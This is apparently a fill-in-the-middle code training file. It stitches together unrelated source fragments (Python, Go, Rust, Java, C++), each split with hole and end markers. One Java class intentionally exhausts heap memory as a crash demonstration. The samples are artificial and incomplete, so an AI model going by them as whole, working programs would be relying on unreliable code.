tar_path = tempfile.mktemp(suffix='.tar')
with Timing('tar_runtime_package'):
subprocess.check_call(['tar', '-C', pkg_dir, '-cf', tar_path, '.'])
u_blob = open(tar_path, 'r').read()
# We use gzip for performance instead of python's zip.
with Timing('gzip_runtime_tar'):
subprocess.check_call(['gzip', tar_path, '-1'])
return open(os.path.join(pkg_dir, tar_path + '.gz'), 'rb').read(), u_blob
def has_pkg_descriptor(descriptor_files, ctx):
for f in descriptor_files:
if ctx.Contains(f):
return True
return False
def descriptor_parser(descriptor_files, ctx):
descriptor = None
for f in descriptor_files:
if ctx.Contains(f):
descriptor = f
descriptor_contents = ctx.GetFile(descriptor)
break
if not descriptor:
logging.info("No package descriptor found. No packages installed.")
return None
return descriptor_contents
def descriptor_copy(ctx, descriptor_files, app_dir):
for f in descriptor_files:
if ctx.Contains(f):
with open(os.path.join(app_dir, f), 'w') as w:
w.write(ctx.GetFile(f))
def gen_tmp_dir(dirr):
tmp_dir = tempfile.mkdtemp()
dir_name = os.path.join(tmp_dir, dirr)
os.mkdir(dir_name)
return dir_name
def creation_time(image):
logging.info(image.config_file())
cfg = json.loads(image.config_file())
return cfg.get('created')
def timestamp_to_time(dt_str):
dt = dt_str.rstrip('Z')
return datetime.datetime.strptime(dt, "%Y-%m-%dT%H:%M:%S")
def generate_overrides(set_env, venv_dir=constants.VENV_DIR):
overrides_dct = {
'created': str(datetime.date.today()) + 'T00:00:00Z',
}
if set_env:
env = {
'VIRTUAL_ENV': venv_dir,
}
path_dir = os.path.join(venv_dir, "bin")
env['PATH'] = '%s:$PATH' % path_dir
overrides_dct['env'] = venv_dir
return overrides_dct
def parseCacheLogEntry(entry):
"""
This takes an FTL log entry and parses out relevant caching information
It returns a map with the information parsed from the entry
Example entry (truncated for line length):
INFO [CACHE][MISS] v1:PYTHON:click:==6.7->f1ea...
Return value for this entry:
{
"key_version": "v1",
"language": "python",
"phase": 2,
"package": "click",
"version": "6.7",
"key": "f1ea...",
"hit": True
}
"""
if "->" not in entry or "[CACHE]" not in entry:
logging.warn("cannot parse non-cache log entry %s" % entry)
return None
entry = entry.rstrip("\n").lstrip("INFO").lstrip(" ").lstrip("[CACHE]")
hit = True if entry.startswith("[HIT]") else False
entry = entry.lstrip("[HIT]").lstrip("[MISS]").lstrip(" ")
parts = entry.split("->")[0]
key = entry.split("->")[1]
parts = parts.split(":")
if len(parts) == 2:
# phase 1 entry
return {
"key_version": parts[0],
"language": parts[1],<|fim▁hole|> }
else:
# phase 2 entry
return {
"key_version": parts[0],
"language": parts[1],
"phase": 2,
"package": parts[2],
"version": parts[3],
"key": key,
"hit": hit
}
def run_command(cmd_name,
cmd_args,
cmd_cwd=None,
cmd_env=None,
cmd_input=None,
err_type=ftl_error.FTLErrors.INTERNAL()):
with Timing(cmd_name):
logging.info("`%s` full cmd:\n%s" % (cmd_name, " ".join(cmd_args)))
proc_pipe = None
proc_pipe = subprocess.Popen(
cmd_args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=cmd_cwd,
env=cmd_env,
)
stdout, stderr = proc_pipe.communicate(input=cmd_input)
logging.info("`%s` stdout:\n%s" % (cmd_name, stdout))
err_txt = ""
if stderr:
err_txt = "`%s` had error output:\n%s" % (cmd_name, stderr)
logging.error(err_txt)
if proc_pipe.returncode:
ret_txt = "error: `%s` returned code: %d" % (cmd_name,
proc_pipe.returncode)
logging.error(ret_txt)
if err_type == ftl_error.FTLErrors.USER():
raise ftl_error.UserError("%s\n%s" % (err_txt, ret_txt))
elif err_type == ftl_error.FTLErrors.INTERNAL():
raise ftl_error.InternalError("%s\n%s" % (err_txt, ret_txt))
else:
raise Exception("Unknown error type passed to run_command")<|fim▁end|> | "phase": 1,
"key": key,
"hit": hit |
<|file_name|>WindowsInputService.cpp<|end_file_name|><|fim▁begin|>#ifdef WINDOWS_PLATFORM
#include "WindowsInputService.hpp"
#include "WindowsMouseInterface.hpp"
#include "WindowsKeyboardInterface.hpp"
namespace MPACK
{
namespace Input
{
WindowsInputService::WindowsInputService()
{
m_pMouse = new WindowsMouseInterface;
m_pKeyboard = new WindowsKeyboardInterface;
Reset();
}
WindowsInputService::~WindowsInputService()
{
}
void WindowsInputService::Update()
{
m_pMouse->Update();
m_pKeyboard->Update();
}
void WindowsInputService::Reset()
{
m_pMouse->Reset();
m_pKeyboard->Reset();
}
MouseInterface* WindowsInputService::GetMouse() const
{
return m_pMouse;
}
KeyboardInterface* WindowsInputService::GetKeyboard() const
{
return m_pKeyboard;
}<|fim▁hole|><|fim▁end|> | }
}
#endif |
<|file_name|>backends.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
from django.core.mail.backends.base import BaseEmailBackend
from django.core.mail.message import sanitize_address
from django.conf import settings
import requests
import logging
logger = logging.getLogger(__name__)
class Newsletter2GoEmailBackend(BaseEmailBackend):
n2g_api_endpoint = 'https://www.newsletter2go.de/de/api/send/email/'<|fim▁hole|>
def send_messages(self, emails):
"""
Sends one or more EmailMessage objects and returns the number of email
messages sent.
"""
if not emails:
return
num_sent = 0
for email in emails:
if not email.recipients():
continue
from_email = sanitize_address(email.from_email, email.encoding)
recipients = [sanitize_address(addr, email.encoding)
for addr in email.recipients()]
logger.debug('Sending email from {0} to {1}'.format(from_email, ', '.join(recipients)))
for recipient in recipients:
payload = {
'key': settings.NEWSLETTER2GO_API_KEY,
'to': recipient,
'from': from_email,
'subject': email.subject,
}
payload['html' if email.content_subtype == 'html' else 'text'] = email.body
response = requests.post(self.n2g_api_endpoint, payload)
response_json = response.json()
if response_json.get('status') == 200:
num_sent += 1
return num_sent<|fim▁end|> | |
<|file_name|>32.d.ts<|end_file_name|><|fim▁begin|><|fim▁hole|>
export = ServiceDesk32;<|fim▁end|> | import { ServiceDesk32 } from "../../"; |
<|file_name|>ICMS.java<|end_file_name|><|fim▁begin|>package br.com.caelum.designpatterns.decorator.imposto;
import br.com.caelum.designpatterns.modelo.Orcamento;
public class ICMS extends Imposto{
public ICMS(Imposto outroImposto) {
super(outroImposto);
}
public ICMS() {
}
public double calcula(Orcamento orcamento){
return orcamento.getValor() * 0.1 + calculoDoOutroImposto(orcamento);
}<|fim▁hole|><|fim▁end|> | } |
<|file_name|>FillHeapLocalMethodOnStack.java<|end_file_name|><|fim▁begin|>package com.dev9.crash.bad;
import com.dev9.crash.AbstractBadThing;
import org.springframework.stereotype.Service;
@Service
public class FillHeapLocalMethodOnStack extends AbstractBadThing {
public String getBadThingDescription() {
return "Fills up the heap using an object with a local method. This method allocates an object on the stack which grows until OOM.";
}
public String getBadThingName() {<|fim▁hole|> @Override
public String getBadThingId() {
return "fill-up-the-heap-object-local-method-stack-oom";
}
public String doBadThing() throws Exception {
MemoryMasher mm = new MemoryMasher();
mm.stackHeapMasher();
return null;
}
}<|fim▁end|> | return "Fill Up The Heap On The Stack";
}
|
<|file_name|>test.rs<|end_file_name|><|fim▁begin|>//-----------------------------------------------------------------------
//
// mod parser::atom TEST
//
//-----------------------------------------------------------------------
use super::Status;
use super::{parse_dot, parse_eof, parse_literal, parse_match, MatchRules};
#[test]
fn test_parse_literal_ok() {
let rules = rules!{};
let status_init = Status::init("aaaaaaaaaaaaaaaa", &rules);
let (status_end, _) = parse_literal(status_init, "aaa").ok().unwrap();
assert!(status_end.pos.col == 3);
assert!(status_end.pos.n == 3);
assert!(status_end.pos.row == 0);
}
#[test]
fn test_parse_literal_ok2() {
let rules = rules!{};
let status_init = Status::init("abcdefghij", &rules);
let (status_end, _) = parse_literal(status_init, "abc").ok().unwrap();
assert_eq!(status_end.pos.col, 3);
assert_eq!(status_end.pos.n, 3);<|fim▁hole|>}
#[test]
fn test_parse_literal_fail() {
let rules = rules!{};
let status_init = Status::init("abcdefghij", &rules);
assert!(parse_literal(status_init, "bbb").is_err());
}
#[test]
fn test_parse_literal_fail2() {
let rules = rules!{};
let status_init = Status::init("abcdefghij", &rules);
assert!(parse_literal(status_init, "abd").is_err());
}
#[test]
fn test_parse_literal_fail_short_text2parse() {
let rules = rules!{};
let status_init = Status::init("abcd", &rules);
assert!(parse_literal(status_init, "abcdefghij").is_err());
}
#[test]
fn test_parse_literal_with_new_line() {
let rules = rules!{};
let status_init = Status::init(
"aa
aaaaaaaaaaaaaa",
&rules,
);
let (status_end, _) = parse_literal(
status_init,
"aa
a",
).ok()
.unwrap();
assert!(status_end.pos.col == 1);
assert!(status_end.pos.row == 1);
}
#[test]
fn test_parse_dot() {
let rules = rules!{};
let status = Status::init("ab", &rules);
let (status, _) = parse_dot(status).ok().unwrap();
assert!(status.pos.col == 1);
assert!(status.pos.n == 1);
assert!(status.pos.row == 0);
let (status, _) = parse_dot(status).ok().unwrap();
assert!(status.pos.col == 2);
assert!(status.pos.n == 2);
assert!(status.pos.row == 0);
assert!(parse_dot(status).is_err());
}
#[test]
fn test_parse_match_ok() {
let rules = rules!{};
let status = Status::init("a f0ghi", &rules);
let match_rules = MatchRules::new().with_chars("54321ed_cba");
let (status, _) = parse_match(status, &match_rules).ok().unwrap();
assert_eq!(status.pos.col, 1);
assert_eq!(status.pos.n, 1);
assert_eq!(status.pos.row, 0);
let (status, _) = parse_dot(status).ok().unwrap();
let match_rules = MatchRules::new().with_bound_chars(vec![('f', 'g'), ('h', 'j')]);
let (status, _) = parse_match(status, &match_rules).ok().unwrap();
assert_eq!(status.pos.col, 3);
assert_eq!(status.pos.n, 3);
assert_eq!(status.pos.row, 0);
assert!(parse_match(status, &match_rules).is_err());
}
#[test]
fn test_parse_match_err() {
let rules = rules!{};
let status = Status::init("a9", &rules);
let match_rules = MatchRules::new().with_chars("ed_cba");
let (status, _) = parse_match(status, &match_rules).ok().unwrap();
assert_eq!(status.pos.col, 1);
assert_eq!(status.pos.n, 1);
assert_eq!(status.pos.row, 0);
let match_rules = MatchRules::new().with_bound_chars(vec![('a', 'z'), ('0', '8')]);
assert!(parse_match(status, &match_rules).is_err());
}
#[test]
fn test_parse_match_eof_ok() {
let rules = rules!{};
let status = Status::init("a", &rules);
let match_rules = MatchRules::new().with_bound_chars(vec![('a', 'z'), ('0', '9')]);
let (status, _) = parse_match(status, &match_rules).ok().unwrap();
assert!(parse_eof(status).is_ok());
}
#[test]
fn test_parse_match_eof_error() {
let rules = rules!{};
let status = Status::init("ab", &rules);
let match_rules = MatchRules::new().with_bound_chars(vec![('a', 'z'), ('0', '9')]);
let (status, _) = parse_match(status, &match_rules).ok().unwrap();
assert!(parse_eof(status).is_err());
}<|fim▁end|> | assert_eq!(status_end.pos.row, 0); |
<|file_name|>MD2.py<|end_file_name|><|fim▁begin|># ===================================================================
#
# Copyright (c) 2014, Legrandin <[email protected]>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ===================================================================
from Cryptodome.Util.py3compat import bord
from Cryptodome.Util._raw_api import (load_pycryptodome_raw_lib,
VoidPointer, SmartPointer,
create_string_buffer,
get_raw_buffer, c_size_t,
c_uint8_ptr)
_raw_md2_lib = load_pycryptodome_raw_lib(
"Cryptodome.Hash._MD2",
"""
int md2_init(void **shaState);
int md2_destroy(void *shaState);
int md2_update(void *hs,
const uint8_t *buf,
size_t len);
int md2_digest(const void *shaState,
uint8_t digest[20]);
int md2_copy(const void *src, void *dst);
""")
class MD2Hash(object):
"""An MD2 hash object.
Do not instantiate directly. Use the :func:`new` function.
:ivar oid: ASN.1 Object ID
:vartype oid: string
:ivar block_size: the size in bytes of the internal message block,
input to the compression function
:vartype block_size: integer
:ivar digest_size: the size in bytes of the resulting hash
:vartype digest_size: integer
"""
# The size of the resulting hash in bytes.
digest_size = 16
# The internal block size of the hash algorithm in bytes.
block_size = 64
# ASN.1 Object ID
oid = "1.2.840.113549.2.2"
def __init__(self, data=None):
state = VoidPointer()
result = _raw_md2_lib.md2_init(state.address_of())
if result:
raise ValueError("Error %d while instantiating MD2"
% result)
self._state = SmartPointer(state.get(),
_raw_md2_lib.md2_destroy)
if data:
self.update(data)
def update(self, data):
"""Continue hashing of a message by consuming the next chunk of data.
Args:
data (byte string/byte array/memoryview): The next chunk of the message being hashed.
"""
result = _raw_md2_lib.md2_update(self._state.get(),<|fim▁hole|> % result)
def digest(self):
"""Return the **binary** (non-printable) digest of the message that has been hashed so far.
:return: The hash digest, computed over the data processed so far.
Binary form.
:rtype: byte string
"""
bfr = create_string_buffer(self.digest_size)
result = _raw_md2_lib.md2_digest(self._state.get(),
bfr)
if result:
raise ValueError("Error %d while instantiating MD2"
% result)
return get_raw_buffer(bfr)
def hexdigest(self):
"""Return the **printable** digest of the message that has been hashed so far.
:return: The hash digest, computed over the data processed so far.
Hexadecimal encoded.
:rtype: string
"""
return "".join(["%02x" % bord(x) for x in self.digest()])
def copy(self):
"""Return a copy ("clone") of the hash object.
The copy will have the same internal state as the original hash
object.
This can be used to efficiently compute the digests of strings that
share a common initial substring.
:return: A hash object of the same type
"""
clone = MD2Hash()
result = _raw_md2_lib.md2_copy(self._state.get(),
clone._state.get())
if result:
raise ValueError("Error %d while copying MD2" % result)
return clone
def new(self, data=None):
return MD2Hash(data)
def new(data=None):
"""Create a new hash object.
:parameter data:
Optional. The very first chunk of the message to hash.
It is equivalent to an early call to :meth:`MD2Hash.update`.
:type data: byte string/byte array/memoryview
:Return: A :class:`MD2Hash` hash object
"""
return MD2Hash().new(data)
# The size of the resulting hash in bytes.
digest_size = MD2Hash.digest_size
# The internal block size of the hash algorithm in bytes.
block_size = MD2Hash.block_size<|fim▁end|> | c_uint8_ptr(data),
c_size_t(len(data)))
if result:
raise ValueError("Error %d while instantiating MD2" |
<|file_name|>meta.py<|end_file_name|><|fim▁begin|><|fim▁hole|>
from pybrain.rl.learners.learner import Learner
class MetaLearner(Learner):
""" Learners that make use of other Learners, or learn how to learn. """<|fim▁end|> | __author__ = 'Tom Schaul, [email protected]' |
<|file_name|>admin.py<|end_file_name|><|fim▁begin|>from django.contrib import admin
from django_revision.modeladmin_mixin import ModelAdminRevisionMixin
from edc_base.modeladmin_mixins import (
ModelAdminNextUrlRedirectMixin, ModelAdminFormInstructionsMixin,
ModelAdminFormAutoNumberMixin,
ModelAdminReadOnlyMixin, ModelAdminAuditFieldsMixin)
from .admin_site import edc_map_admin
from .forms import ContainerForm, InnerContainerForm
from .models import Container, InnerContainer
class ModelAdminMixin(ModelAdminFormInstructionsMixin,
ModelAdminNextUrlRedirectMixin,
ModelAdminFormAutoNumberMixin,
ModelAdminRevisionMixin,
ModelAdminAuditFieldsMixin,
ModelAdminReadOnlyMixin,
admin.ModelAdmin):
list_per_page = 10
date_hierarchy = 'modified'
empty_value_display = '-'
@admin.register(Container, site=edc_map_admin)
class ContainerAdmin(ModelAdminMixin):
form = ContainerForm
list_per_page = 10
list_display = ('name', 'map_area', 'created', 'modified')
list_filter = (
'created',
'modified',
'map_area',
'map_area',
'hostname_modified')
search_fields = ('map_area', 'id')
<|fim▁hole|>class InnerContainerAdmin(ModelAdminMixin):
form = InnerContainerForm
list_per_page = 10
list_display = ('map_area', 'device_id', 'name', 'created', 'modified')
list_filter = (
'created',
'modified',
'map_area',
'container__name',
'name',
'hostname_modified')
search_fields = ('device_id', 'name', 'id')<|fim▁end|> |
@admin.register(InnerContainer, site=edc_map_admin) |
<|file_name|>test_subliminal.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
import shutil
from unittest import TestCase, TestSuite, TestLoader, TextTestRunner
from babelfish import Language
from subliminal import list_subtitles, download_subtitles, save_subtitles, download_best_subtitles, scan_video
from subliminal.tests.common import MOVIES, EPISODES
TEST_DIR = 'test_data'
class ApiTestCase(TestCase):
def setUp(self):
os.mkdir(TEST_DIR)
def tearDown(self):
shutil.rmtree(TEST_DIR)
def test_list_subtitles_movie_0(self):
videos = [MOVIES[0]]
languages = {Language('eng')}
subtitles = list_subtitles(videos, languages)
self.assertEqual(len(subtitles), len(videos))
self.assertGreater(len(subtitles[videos[0]]), 0)
def test_list_subtitles_movie_0_por_br(self):<|fim▁hole|> self.assertGreater(len(subtitles[videos[0]]), 0)
def test_list_subtitles_episodes(self):
videos = [EPISODES[0], EPISODES[1]]
languages = {Language('eng'), Language('fra')}
subtitles = list_subtitles(videos, languages)
self.assertEqual(len(subtitles), len(videos))
self.assertGreater(len(subtitles[videos[0]]), 0)
def test_download_subtitles(self):
videos = [EPISODES[0]]
for video in videos:
video.name = os.path.join(TEST_DIR, os.path.split(video.name)[1])
languages = {Language('eng')}
subtitles = list_subtitles(videos, languages)
download_subtitles(subtitles[videos[0]][:5])
self.assertGreaterEqual(len([s for s in subtitles[videos[0]] if s.content is not None]), 4)
def test_download_best_subtitles(self):
videos = [EPISODES[0], EPISODES[1]]
for video in videos:
video.name = os.path.join(TEST_DIR, os.path.split(video.name)[1])
languages = {Language('eng'), Language('fra')}
subtitles = download_best_subtitles(videos, languages)
for video in videos:
self.assertIn(video, subtitles)
self.assertEqual(len(subtitles[video]), 2)
def test_save_subtitles(self):
videos = [EPISODES[0], EPISODES[1]]
for video in videos:
video.name = os.path.join(TEST_DIR, os.path.split(video.name)[1])
languages = {Language('eng'), Language('fra')}
subtitles = list_subtitles(videos, languages)
# make a list of subtitles to download (one per language per video)
subtitles_to_download = []
for video, video_subtitles in subtitles.items():
video_subtitle_languages = set()
for video_subtitle in video_subtitles:
if video_subtitle.language in video_subtitle_languages:
continue
subtitles_to_download.append(video_subtitle)
video_subtitle_languages.add(video_subtitle.language)
if video_subtitle_languages == languages:
break
self.assertEqual(len(subtitles_to_download), 4)
# download
download_subtitles(subtitles_to_download)
save_subtitles(subtitles)
for video in videos:
self.assertTrue(os.path.exists(os.path.splitext(video.name)[0] + '.en.srt'))
self.assertTrue(os.path.exists(os.path.splitext(video.name)[0] + '.fr.srt'))
def test_save_subtitles_single(self):
videos = [EPISODES[0], EPISODES[1]]
for video in videos:
video.name = os.path.join(TEST_DIR, os.path.split(video.name)[1])
languages = {Language('eng'), Language('fra')}
subtitles = download_best_subtitles(videos, languages)
save_subtitles(subtitles, single=True)
for video in videos:
self.assertIn(video, subtitles)
self.assertEqual(len(subtitles[video]), 2)
self.assertTrue(os.path.exists(os.path.splitext(video.name)[0] + '.srt'))
def test_download_best_subtitles_min_score(self):
videos = [MOVIES[0]]
for video in videos:
video.name = os.path.join(TEST_DIR, os.path.split(video.name)[1])
languages = {Language('eng'), Language('fra')}
subtitles = download_best_subtitles(videos, languages, min_score=1000)
self.assertEqual(len(subtitles), 0)
def test_download_best_subtitles_hearing_impaired(self):
videos = [MOVIES[0]]
for video in videos:
video.name = os.path.join(TEST_DIR, os.path.split(video.name)[1])
languages = {Language('eng')}
subtitles = download_best_subtitles(videos, languages, hearing_impaired=True)
self.assertTrue(subtitles[videos[0]][0].hearing_impaired)
class VideoTestCase(TestCase):
def setUp(self):
os.mkdir(TEST_DIR)
for video in MOVIES + EPISODES:
open(os.path.join(TEST_DIR, os.path.split(video.name)[1]), 'w').close()
def tearDown(self):
shutil.rmtree(TEST_DIR)
def test_scan_video_movie(self):
video = MOVIES[0]
scanned_video = scan_video(os.path.join(TEST_DIR, os.path.split(video.name)[1]))
self.assertEqual(scanned_video.name, os.path.join(TEST_DIR, os.path.split(video.name)[1]))
self.assertEqual(scanned_video.title.lower(), video.title.lower())
self.assertEqual(scanned_video.year, video.year)
self.assertEqual(scanned_video.video_codec, video.video_codec)
self.assertEqual(scanned_video.format, video.format)
self.assertEqual(scanned_video.resolution, video.resolution)
self.assertEqual(scanned_video.release_group, video.release_group)
self.assertEqual(scanned_video.subtitle_languages, set())
self.assertEqual(scanned_video.hashes, {})
self.assertIsNone(scanned_video.audio_codec)
self.assertIsNone(scanned_video.imdb_id)
self.assertEqual(scanned_video.size, 0)
def test_scan_video_episode(self):
video = EPISODES[0]
scanned_video = scan_video(os.path.join(TEST_DIR, os.path.split(video.name)[1]))
self.assertEqual(scanned_video.name, os.path.join(TEST_DIR, os.path.split(video.name)[1]))
self.assertEqual(scanned_video.series, video.series)
self.assertEqual(scanned_video.season, video.season)
self.assertEqual(scanned_video.episode, video.episode)
self.assertEqual(scanned_video.video_codec, video.video_codec)
self.assertEqual(scanned_video.format, video.format)
self.assertEqual(scanned_video.resolution, video.resolution)
self.assertEqual(scanned_video.release_group, video.release_group)
self.assertEqual(scanned_video.subtitle_languages, set())
self.assertEqual(scanned_video.hashes, {})
self.assertIsNone(scanned_video.title)
self.assertIsNone(scanned_video.tvdb_id)
self.assertIsNone(scanned_video.imdb_id)
self.assertIsNone(scanned_video.audio_codec)
self.assertEqual(scanned_video.size, 0)
def test_scan_video_subtitle_language_und(self):
video = EPISODES[0]
open(os.path.join(TEST_DIR, os.path.splitext(os.path.split(video.name)[1])[0]) + '.srt', 'w').close()
scanned_video = scan_video(os.path.join(TEST_DIR, os.path.split(video.name)[1]))
self.assertEqual(scanned_video.subtitle_languages, {Language('und')})
def test_scan_video_subtitles_language_eng(self):
video = EPISODES[0]
open(os.path.join(TEST_DIR, os.path.splitext(os.path.split(video.name)[1])[0]) + '.en.srt', 'w').close()
scanned_video = scan_video(os.path.join(TEST_DIR, os.path.split(video.name)[1]))
self.assertEqual(scanned_video.subtitle_languages, {Language('eng')})
def test_scan_video_subtitles_languages(self):
video = EPISODES[0]
open(os.path.join(TEST_DIR, os.path.splitext(os.path.split(video.name)[1])[0]) + '.en.srt', 'w').close()
open(os.path.join(TEST_DIR, os.path.splitext(os.path.split(video.name)[1])[0]) + '.fr.srt', 'w').close()
open(os.path.join(TEST_DIR, os.path.splitext(os.path.split(video.name)[1])[0]) + '.srt', 'w').close()
scanned_video = scan_video(os.path.join(TEST_DIR, os.path.split(video.name)[1]))
self.assertEqual(scanned_video.subtitle_languages, {Language('eng'), Language('fra'), Language('und')})
def suite():
suite = TestSuite()
suite.addTest(TestLoader().loadTestsFromTestCase(ApiTestCase))
suite.addTest(TestLoader().loadTestsFromTestCase(VideoTestCase))
return suite
if __name__ == '__main__':
TextTestRunner().run(suite())<|fim▁end|> | videos = [MOVIES[0]]
languages = {Language('por', 'BR')}
subtitles = list_subtitles(videos, languages)
self.assertEqual(len(subtitles), len(videos)) |
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|><|fim▁hole|><|fim▁end|> | """passlib tests""" |
<|file_name|>agilentBase8590A.py<|end_file_name|><|fim▁begin|>"""
Python Interchangeable Virtual Instrument Library
Copyright (c) 2013-2017 Alex Forencich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from .agilentBase8590 import *
class agilentBase8590A(agilentBase8590):
"Agilent 8590A series IVI spectrum analyzer driver"
def __init__(self, *args, **kwargs):
self.__dict__.setdefault('_instrument_id', '')
super(agilentBase8590A, self).__init__(*args, **kwargs)<|fim▁hole|>
def _display_fetch_screenshot(self, format='bmp', invert=False):
if self._driver_operation_simulate:
return b''
#if format not in ScreenshotImageFormatMapping:
# raise ivi.ValueNotSupportedException()
#format = ScreenshotImageFormatMapping[format]
self._write("PRINT 1")
rtl = io.BytesIO(self._read_raw())
img = hprtl.parse_hprtl(rtl)
# rescale to get white background
# presuming background of (90, 88, 85)
img[:,:,0] *= 255/90
img[:,:,1] *= 255/88
img[:,:,2] *= 255/85
bmp = hprtl.generate_bmp(img)
return bmp<|fim▁end|> |
self._identity_description = "Agilent 8590 series IVI spectrum analyzer driver"
self._identity_supported_instrument_models = ['8590A', '8590B', '8591A', '8592A', '8592B',
'8593A', '8594A', '8595A'] |
<|file_name|>status.go<|end_file_name|><|fim▁begin|>/*
*
* Copyright 2017 gRPC authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
*/
// Package status implements errors returned by gRPC. These errors are
// serialized and transmitted on the wire between server and client, and allow
// for additional data to be transmitted via the Details field in the status
// proto. gRPC service handlers should return an error created by this
// package, and gRPC clients should expect a corresponding error to be
// returned from the RPC call.
//
// This package upholds the invariants that a non-nil error may not
// contain an OK code, and an OK code must result in a nil error.
package status
import (
"context"<|fim▁hole|>
"github.com/golang/protobuf/proto"
"github.com/golang/protobuf/ptypes"
spb "google.golang.org/genproto/googleapis/rpc/status"
"google.golang.org/grpc/codes"
"google.golang.org/grpc/internal"
)
func init() {
internal.StatusRawProto = statusRawProto
}
func statusRawProto(s *Status) *spb.Status { return s.s }
// statusError is an alias of a status proto. It implements error and Status,
// and a nil statusError should never be returned by this package.
type statusError spb.Status
func (se *statusError) Error() string {
p := (*spb.Status)(se)
return fmt.Sprintf("rpc error: code = %s desc = %s", codes.Code(p.GetCode()), p.GetMessage())
}
func (se *statusError) GRPCStatus() *Status {
return &Status{s: (*spb.Status)(se)}
}
// Status represents an RPC status code, message, and details. It is immutable
// and should be created with New, Newf, or FromProto.
type Status struct {
s *spb.Status
}
// Code returns the status code contained in s.
func (s *Status) Code() codes.Code {
if s == nil || s.s == nil {
return codes.OK
}
return codes.Code(s.s.Code)
}
// Message returns the message contained in s.
func (s *Status) Message() string {
if s == nil || s.s == nil {
return ""
}
return s.s.Message
}
// Proto returns s's status as an spb.Status proto message.
func (s *Status) Proto() *spb.Status {
if s == nil {
return nil
}
return proto.Clone(s.s).(*spb.Status)
}
// Err returns an immutable error representing s; returns nil if s.Code() is
// OK.
func (s *Status) Err() error {
if s.Code() == codes.OK {
return nil
}
return (*statusError)(s.s)
}
// New returns a Status representing c and msg.
func New(c codes.Code, msg string) *Status {
return &Status{s: &spb.Status{Code: int32(c), Message: msg}}
}
// Newf returns New(c, fmt.Sprintf(format, a...)).
func Newf(c codes.Code, format string, a ...interface{}) *Status {
return New(c, fmt.Sprintf(format, a...))
}
// Error returns an error representing c and msg. If c is OK, returns nil.
func Error(c codes.Code, msg string) error {
return New(c, msg).Err()
}
// Errorf returns Error(c, fmt.Sprintf(format, a...)).
func Errorf(c codes.Code, format string, a ...interface{}) error {
return Error(c, fmt.Sprintf(format, a...))
}
// ErrorProto returns an error representing s. If s.Code is OK, returns nil.
func ErrorProto(s *spb.Status) error {
return FromProto(s).Err()
}
// FromProto returns a Status representing s.
func FromProto(s *spb.Status) *Status {
return &Status{s: proto.Clone(s).(*spb.Status)}
}
// FromError returns a Status representing err if it was produced from this
// package or has a method `GRPCStatus() *Status`. Otherwise, ok is false and a
// Status is returned with codes.Unknown and the original error message.
func FromError(err error) (s *Status, ok bool) {
if err == nil {
return &Status{s: &spb.Status{Code: int32(codes.OK)}}, true
}
if se, ok := err.(interface {
GRPCStatus() *Status
}); ok {
return se.GRPCStatus(), true
}
return New(codes.Unknown, err.Error()), false
}
// Convert is a convenience function which removes the need to handle the
// boolean return value from FromError.
func Convert(err error) *Status {
s, _ := FromError(err)
return s
}
// WithDetails returns a new status with the provided details messages appended to the status.
// If any errors are encountered, it returns nil and the first error encountered.
func (s *Status) WithDetails(details ...proto.Message) (*Status, error) {
if s.Code() == codes.OK {
return nil, errors.New("no error details for status with code OK")
}
// s.Code() != OK implies that s.Proto() != nil.
p := s.Proto()
for _, detail := range details {
any, err := ptypes.MarshalAny(detail)
if err != nil {
return nil, err
}
p.Details = append(p.Details, any)
}
return &Status{s: p}, nil
}
// Details returns a slice of details messages attached to the status.
// If a detail cannot be decoded, the error is returned in place of the detail.
